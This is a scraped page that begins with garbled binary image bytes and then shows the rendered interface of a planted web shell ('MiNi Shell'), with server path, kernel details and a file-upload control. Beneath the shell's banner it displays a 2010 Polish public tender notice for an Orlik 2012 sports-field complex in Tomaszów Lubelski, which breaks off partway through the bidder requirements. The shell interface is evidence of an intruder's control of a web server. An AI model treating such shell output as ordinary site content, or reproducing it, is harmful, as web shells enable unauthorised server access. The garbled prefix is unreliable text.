JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/134730-N-2010.html

<p class="kh_header"><b>Tomaszów Lubelski: Budowę kompleksu boisk sportowych w ramach programu
MOJE BOISKO, ORLIK 2012
przy ul. Żwirki i Wigury 6 w Tomaszowie Lubelskim</b><br>
<b>Numer ogłoszenia: 134730 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowę kompleksu boisk sportowych w ramach programu
MOJE BOISKO, ORLIK 2012
przy ul. Żwirki i Wigury 6 w Tomaszowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest :  Budowa kompleksu boisk sportowych w ramach programu Moje Boisko, Orlik 2012 (boisko piłkarskie oraz boisko wielofunkcyjne wraz z zapleczem sanitarno-szatniowym) w Tomaszowie Lubelskim.
2.  Roboty budowlane zostały określone w Projekcie Budowlano-Wykonawczym, pn.Moje Boisko, Orlik 2012 opracowanym przez Biuro Inżynierskie Matej & Matej w Tomaszowie Lubelskim.  
      Przedmiot zamówienia obejmuje między innymi:
2.1. Roboty przygotowawcze :
  -    mechaniczne rozebranie naw. z mieszanek mineralno-bitumicznych o gr 3cm  - 1630.0 m2,
  -    rozbiórka elementów kontr. betonowych niezbrojonych o grub. ponad 15 cm - fundament słupów do siatkówki, kosza i ławek  -   4.03 m3,  
   -    wywiezienie gruzu spryzmowanego samochodami skrzyniowymi na odl. do 1 km 	  -    52.93 m3,
 i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych,
2.2. Roboty budowlane :
 1)  Boisko do piłki nożnej :
 a)  Roboty ziemne:
 -    wykopy wykonywane spycharkami o mocy 55 kW w gr. kat.III - 24,49 m3,
 -    roboty ziemne wyk. koparkami przedsiębiernymi 0.40 m3 w ziemi kat. I-III uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczym na odległość ok. 1 km - 164.57 m3, 
 -   dostawa piasku średnioziarnistego do wyrównania i wyprofilowania koryta  - 285.36 m3,
 b)  Podbudowa i nawierzchnia
 -    obrzeża betonowe o wym. 30x8 cm na podsypce cem.-piask. z wypełn. spoin zaprawą cementową   -  184,0 m,
 -    wykonanie i zagęszczenie mechaniczne warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm - 1860.0 m2,
 -    podbudowa z kruszyw łamanych - warstwa dolna o gr. 10 cm - kruszywo 
 frakcji 31,5 - 63 mm    - 1860.0 m2,
 -    podbudowa z kruszyw łam. - warstwa górna o gr.5 cm - kruszywo frakcji 0-31,5 mm - 1860.0 m2,  
 -    wykonanie nawierzchni użytkowej z trawy syntetycznej o gr. min 6,0 cm, gęstości włókien min. 97 000 włókien/m2, rodzaj włókien - monofilowe, polietylenowe, ciężar włókien min. 11 000 Dtex    - 1860.0 m2,
 c)  Dostawa i montaż sprzętu
 -    wykonanie fundamentów betonowych z betonu żwirowego o obj. 0.3 m3 pod słupki do piłki nożnej  - 0.38 m3,     
 -    ustawienie w gotowych otworach bramek aluminiowych stacjonarnych do piłki nożnej 
       5,0 x 2,0m głębokości 1,2 m z siatką z bezwęzłowej siatki polipropylenowej o splocie min. 3 mm. - 2.0 szt,
 d)  Pobocze i skarpy
 -    obrzeża betonowe o wym. 20x6 cm na nasypce piaskowej z wyp. spoin piaskiem   - 150.5 m,
 -    nawierzchnia z kostki brukowej betonowej grub. 6 cm na podsypce piaskowej, pobocza kostka szara - 62.66 m2, 
 -    plantowanie skarp i korony nasypów - kat.gr. I-III  - 484.0 m2,
  2)  Boisko do piłki koszykowej
 a)  Roboty ziemne
 -    roboty ziemne wyk. koparkami przedsiębiernymi 0.40 m3 w ziemi kat. I-III uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na odległość ok. 1 km z nakładami uzupełniającymi transportu na dalsze 2 km    - 125.0 m3, 
 -    dostawa piasku średnioziarnistego do wyrównania i wyprofilowania koryta    - 60.7 m3,
 b)  Podbudowa i nawierzchnia
 -    obrzeża betonowe o wym. 30x8 cm na podsypce cement.-piask. z wypełn. spoin zapr. cementowa -  102,4 m,
 -    wykonanie i zagęszczenie mechaniczne warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm  - 613.11 m2,
 -    podbudowa z kruszyw łamanych - warstwa dolna o gr. 10 cm - kruszywo 
      frakcji 31,5 - 63 mm    - 613.11 m2,
 -    podbudowa z kruszyw łamanych - warstwa górna o gr. 5 cm - kruszywo
      frakcji 0-31,5 mm  - 613.11 m2, 
 -    wykonanie warstwy podbudowy elastycznej typu ET grubości min. 30 mm   - 613.11 m2,   
 -    wykonanie nawierzchni typu EPDM z warstwy dolnej z granulatu gumowego SBR gr. min. 7 mm i warstwy górnej z barwnego granulatu EPDM gr. min. 7mm, linie malowane   - 613.11 m2,     
 c)  Dostawa i montaż sprzętu
 -    wykonanie fundamentów betonowych z betonu żwirowego o obj. 0.15 m3 pod słupki do siatkówki   - 0.3 m3,
 -    wykonanie fundamentów betonowych z betonu żwirowego o obj. 0.6 m3 pod słupki do koszykówki  - 2.2 m3,  
 -   ustawienie w gotowych otworach stojaków aluminiowych do siatkówki siatką- stojak uniwersalny  - 1.0 kpl,
 -   ustawienie w gotowych otworach stojaków metalowych do koszykówki - stojak dwumasztowy ocynkowany z wysięgnikiem 1,6 m, tablica epoksydowa 180x105 cm, z obręczą i siatką łańcuchową, z regulacją wysokości - 2.0 szt,
 d) Pobocze i skarpy
 -   obrzeża betonowe o wym. 20x6 cm na nasypce piaskowej z wyp. spoin piaskiem  - 52.7 m,
 -    nawierzchnia z kostki brukowej betonowej grub. 6 cm na podsypce piaskowej, pobocza kostka szara  - 29,95 m2, 
 -    plantowanie skarp i korony nasypów - kat. gr. I-III i obsianie skarp w ziemi urodzajnej  - 39.2 m2,
3)   Budynek zaplecza socjalno-sanitarnego :
a)   Posadowienie budynku zaplecza socjalno-sanitarnego
 -    studnie chłonne z kręgów średnicy 0,6 m i głębokości 1,2 m - SU1  - 14.0 szt,
b)   budynek zaplecza socjalno-szatniowego z instalacjami i wyposażeniem
 -    dostawa i montaż kompletnego (z instalacjami i osprzętem) budynku zaplecza socjalno-sanitarnego   - 58.2 m2,  
c )  Chodniki i utwardzenia :
 -   wykonanie koryta na poszerzeniach chodników w gruncie kat. II-IV za każde dalsze 5cm  - 17.5 m2, 
 -    wykonanie i zagęszczenie mechaniczne warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm   - 321.2 m2,
 -    obrzeża betonowe o wym. 20x6 cm na podsypce piaskowej z wyp. spoin piaskiem   - 77.9 m,
 -    obrzeża betonowe o wym. 30x8 cm na podsypce cem.- piaskowej z wyp. spoin zaprawą cem. - pod budynkiem zaplecza    - 42.92 m,
 -    obramowanie schodów terenowych z palisad 12x14x40 cm na podsypce piaskowej  - 4.01 m2,
 -    nawierzchnia z kostki brukowej betonowej grub. 6 cm na podsypce piaskowej,  pobocza kostka szara 50% i kolorowa 50%  - 283.22 m2, 
d)   Ogrodzenie
 -    betonowanie stóp i płyt fundamentowych niezbrojonych w deskowaniu tradycyjnym - beton B20  - 45.65 m3,
 -    ogrodzenie z siatki na słupach z kształtowników stalowych o rozstawie min. 2,5m i wysokości 3.0m - siatka ocynkowana i powlekana PVC oczka max 4x4 cm. słupy ocynkowane i malowane proszkowo, uwzględnić steżenia na szczytach słupów  - 323.6 m,
 -    ogrodzenie z siatki na słupkach z kształtowników stalowych o rozstawie min. 2,5m - dodatek za nast. 1m wys.  - 335.2 m,
 -    brama o wym. 250x280 cm (w krawędziach ram) z kształtowników zamkniętych, wypełnienie z paneli ogrodzeniowych zgrzewanych punktowo z drutu fi. 5mm z zamkiem i zawiasami, całość ocynkowana i malowana proszkowo na kolor zielony   - 4.0 szt,  
 i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach
      i Specyfikacji technicznej wykonania i odbioru robót budowlanych,
2.3.  Roboty sanitarne - (przyłącze wodno-kanalizacyjne, odwodnienie). 
a)   Przyłącze wody :
 -    wykopy jamiste wykonane koparkami podsiębiernymi 0.40 m3 na odkład w gruncie kat III   - 68.77 m3,
 -    pełne umocnienie pionowych ścian wykopów liniowych o głębok. do 3.0 m wypraskami w grunt. suchych kat. III-IV wraz z rozbiór.(szer. do 1m) - 196.48 m2,   
 -    przyłącze wodociągowe z rur ciśnieniowych PE łączonych metodą zgrzewania czołowego, rurociągi o śr. 50 mm (nakład na 1m przyłącza) - rura PE25 -    63.40 m, 
b)   Przyłącze kanalizacji sanitarnej
 -    wykopy jamiste wykonane koparkami podsiębiernymi 0.40 m3 na odkład
      w gruncie kat III   -  4.62 m3,
 -    pełne umocnienie pionowych ścian wykopów liniowych o głębok. do 3.0 m wypraskami w grunt. suchych kat. III-IV wraz z rozbiór.(szer. do 1m)  -    15.4 m2,
 -    studnia rewizyjna z kręgów betonowych o śr. 1000 mm w gotowym wykopie o gł. 3 m ( z za każde 0,5 m różnicy głębokości -3)   -  1 stud,
c)   Przyłącze kanalizacji deszczowej :
 -    drenowanie wyk. ręczne w terenach nizinnych w gr. kat. II-III na głęb. 0.9 m, śr. rur 65 mm - rury z PVC-U   -     584.4 m,
 -    drenowanie wyk. ręcznie w terenach nizinnych w gr. kat. Ii-III na gł. 0,9 m śr. rur 100 mm - rury PVC-U   -  33,6 m,
 -    drenaż - podsypka filtracyjna z kruszywa mineralnego łamanego w gotowym suchym wykopie z gotowego kruszywa  -   198.11 m3,
      i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2.4 Roboty elektryczne :
a)   Przyłącze kablowe zalicznikowe :
 -   kopanie koparkami podsiębiernymi rowów dla kabli o głębokości do 0.6 m 
     i szer. dna do 0,4m w gruntach kat. III-IV   - 30.0 m,
 -   kopanie koparkami podsiębiernymi rowów dla kabli o głębokości do 1,0 m
     i szer. dna do 0,4 m w gruncie kat. III-IV  -  25.0 m,
 -   ręczne układanie kabli wielożyłowych o masie do 1,0 kg/ m na nap. znam. poniżej 110 kV w rowach kablowych  -  55.0 m,                             
 -   montaż osprzętu modułowego w rozdzielni głównej T- G wyłącznik nadprądowy 3-bieg. S 303 B 32A  - 1.0 szt,
b)  Tablica oświetleniowa :
 -   mocowanie na gotowym podłożu tablicy oświetleniowej T- O o masie do 5kg. z częściowym rozebraniem i złożeniem bez podłączenia (il. Otworów mocujących do 4)  - 1.0 szt,
 -   montaż osprzętu modułowego w rozdzielnicy T- O rozłącznika  FR-303 In=100A  - 1.0 szt,
 -   montaż osprzętu modułowego w rozdzielnicach - ochronnik przepięciowy -DEHNVENTIL4 bieg.  -  1,0 szt,
c)  Oświetlenie boiska do piłki nożnej i piłki koszykowej :
 -   kopanie koparkami podsiębiernymi rowów dla kabli o głębokości do 1.0 m i szer. dna do 0,4m w gruntach kat. III-IV   - 125.0 m,
 -   ręczne układanie kabli wielożyłowych o masie do 1.0 kg/m na nap. znam. poniżej 110 kV w rowach kablowych   - 251.0 m,
 -   ręczne stawianie słupów oświetleniowych o masie do 250 kg w gruncie kat. I-III   - 8.0 szt,
 -   montaż głowic kablowych - zarobienie na sucho końca kabla 4-żyłowego o przekr. do 50 mm2 na napięcie do 1 kV o izolacji i powłoce z tworzyw szt - 20.0 szt,
d)  Instalacja uziemiająca :
 -   układanie bednarki w rowach kablowych - bednarka do 120 mm2  - 175.0 m,
 -   łączenie przewodów uziemiających przez spawanie w wykopie - bednarka 120mm2 -   6.0 szt,
i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2.5. Roboty elektryczne uzupełniające :
a)  przyłącze monitoringu :
 -   ręczne układanie kabla YKY 3x2,5 mm2 zasilajacego kamery w rowie kablowym  -  32 m,
 -   ręczne układanie kabla sygnałowego XYWD ekw do kamer w rowie kablowym   - 79.0 m,
 -   wciągnięcie kabla YKY 3x2,5mm2 w słup lub rury osłonowe - 16.0 m -1przew,      
 -   montaż kamer SN-468CW z pełnym wyposażeniem na słupach oświetleniowych   - 2.0 kpl,
b)  przyłącze nagłośnienia :
 -   ręczne układanie kabla YKY 3x2,5mm2 zasilającego w rowie kablowym - 30.0 m,
 -   wciąganie kabla YKY 3x2,5mm2 w słup lub rury osłonowe - 8.0 m -1przew,
c)  przyłącze zasilające tablice wyników :
 -   ręczne układanie kabla YKY 3x2,5mm2 zasilającego tablicę wyników w rowach kablowych  - 7.0 m,
 -   montaż tablicy wyników o masie do 150 kg. wraz z konstrukcją - mocowanie przez zabetonowanie w gotowych otworach   - 1.0 szt,
 -   ręczne odkopanie kabli SN  NN o głębokości do 1,0 m i szer. dna do 0,4 m w gruncie kat. III - 96,0 m,
 -   układanie rur ochronnych dwudzielnych AROT A+130 PS czerwonych na istniejącym kablu SN o śr. do 130 mm w wykopie  -  47,0 m, 
 -   układanie rur ochronnych dwudzielnych AROT A+110 PS niebieskiej na istniejącym kablu NN o śr. do 110  mm w wykopie - 49,0 m,                                                
i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2.6 Demontaż linii nn :
 -   demontaż oświetlenia zewnętrznego na słupach linii niskiego napięcia - wysięgnik jednoramienny z lampą rtęciową (1żarówka) -  3.0 kpl,
 -   demontaż mechaniczny słupów betonowych pojedynczych o dł. do 10 m  -  3.0 szt, 
 i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2.7 Przyłącze kanalizacji sanitarnej :
a)  roboty rozbiórkowe :
 -   demontaż i montaż krawężników betonowych wystających 15x30 cm na podsypce piaskowej -  19,0 m,
 -   rozebranie nawierzchni z kostki betonowej na podsypce cem. piaskowej z wyp. spoin zaprawa cementowa  -  99.0 m2,
 -   rozbiórka i ułożenie nawierzchni z mieszanki mineralno-asfaltowej - 0,69 t,
 -   podbudowa betonowa bez dylatacji - grub. warstwy po zagęszczeniu 12cm + dodatk. 3 cm  - 77.20 m2, 
 -   nawierzchnie z kostki brukowej betonowej grub. 6cm. na podsypce 
     cementowo - piaskowej - kostka z odzysku   - 99.0 m2, 
b)  przyłącze kanalizacji sanitarnej
 -   wykopy jamiste wykonane koparkami podsiębiernymi 0.40 m3 na odkład
     w gruncie kat. III   - 183.74 m3,
 -   pełne umocnienie pionowych ścian wykopów liniowych o głęb. do 3.0m wypraskami w grunt. suchych kat. III-IV wraz z rozbiór.(szer. do 1m) - 321.68 m2,
 -   kanały rurowe - podłoża z materiałów sypkich o grub. 10 cm - piasek  -   83,1 m2,
 -   osypka i nasypka z piasku do wys. 30 cm ponad wierzch rury -  41,55 m3,
 -   kanały z rur PVC łączonych na wcisk o śr. zewn. 315 mm  -   7,5 m, 
 -   kanały z rur PVC łączonych na wcisk o śr. zewn. 160 mm  -   83.10 m,
 -   studnie rewizyjne z kręgów bet. o śr. 1000 mm w gotowym wykopie o głęb. 3 m z przejściami szczelnymi wbudowanymi (z za każde 0,5 m różnicy gęb. -3)  -  2 stud,            
 -   zagęszczenie nasypów ubijakami mech. grunty sypkie kat. I-III - 128.55 m3, 
i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych.
2.8. Utwardzenia i dojazdy :
a)  roboty ziemne :
 -  mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o gr. 3cm - 214.50 m2,   
 -  mechaniczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat. I-IV głęb. 20 cm w tym ok. 30% tłucznia spod boiska asfaltowego hałdować odrębnie - 185.40 m2,      
 -   roboty ziemne wykonane koparkami przedsiębiernymi 0.40 m3 w ziemi kat. I-III uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na odl. do 1 km - 110.64 m3, 
b)  nawierzchnia i okrawężnikowanie :
 -   ręczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne
     nawierzchni w gr. kat. I-II  - 185.40 m2,  
 -   ława pod krawężniki z kruszywa łamanego -  1.38 m3,   
 -   krawężniki betonowe wystające o wym. 15x30 cm na podsypce piaskowej  - 115.18 m,
 -   wykonanie i zagęszczenie mechaniczne warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm - 185.40 m2,      
 -   podbudowa betonowa z dylatacją - gr. warstwy po zagęszczeniu 12 cm + 3 cm   - 185.40 m2,   
 -   nawierzchnie z kostki brukowej betonowej grubości 8 cm na podsypce
     cementowo - piaskowej   - 185.40 m2,    
c)  Chodniki i roboty uzupełniające
 -   rozebranie obrzeży 6x20 cm na podsypce piaskowej   - 3.10 m,
 -   wykopy oraz przekopy wykonane koparkami podsiębiernymi 0.40 m3 na odkład w gr. kat. I-II - przerzut zgromadzonego gruntu humusowego i formowanie skarp  - 18.34 m3,    
 -   plantowanie skarp i korony nasypów - kat.gr. I-III  - 91.70 m2,        
 i inne roboty oznaczone w projekcie budowlano - wykonawczym, przedmiarach i Specyfikacji technicznej wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.31.00.00-3, 45.33.00.00-9, 45.21.22.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w wysokosci 10 000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający od Wykonawcy  wymaga, aby wykazał się posiadaniem uprawnień do wykonywania działalności. Wykonawca przedłoży oświadczenie, ze osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładaną obowiązek posiadania takich uprawnień, np., uprawnienia budowlane, spawalnicze, energetyczne i inne. 
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Od Wykonawcy Zamawiający wymaga, aby wykazał się doświadczeniem wykonania już co najmniej 1 roboty o charakterze i złożoności porównywalnej z robotami, których dotyczy postępowanie, tj. wykonywali boiska sportowe szkolne lub inne.
Wykonawcy przedłożą w ofercie wykaz robót budowlanych wg Załącznika Nr 3 do SIWZ -  Wykaz ważniejszych realizacji - w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone , np.  referencję, protokół odbioru, itp.  
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy do oferty wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy  robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami;
  Zamawiający wymaga by wykonawca wykazał się możliwością dysponowania następującym sprzętem :
     -   równiarki lub spycharki uniwersalne,
     -   koparki z czerpakami,
     -   samochodów samowyładowczych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,
Wykonawca przedłoży oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Wykonawca załączy do oferty oświadczenie, że osoby wyznaczone do nadzorowania robót posiadają odpowiednie uprawnienia budowlane w branży ogólnobudowlanej, drogowej, sanitarnej i elektrycznej z przynależnością do właściwej izby samorządu zawodowego. 
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by wykonawca  przedstawił :
a)  informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu   
składania  wniosków o dopuszczenie do  udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
b)  Zamawiający wymaga by wykonawca dysponował środkami finansowymi lub zdolnością   kredytową w wysokości co najmniej 100 000 zł,
c)  jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez  zamawiają cego warunku.
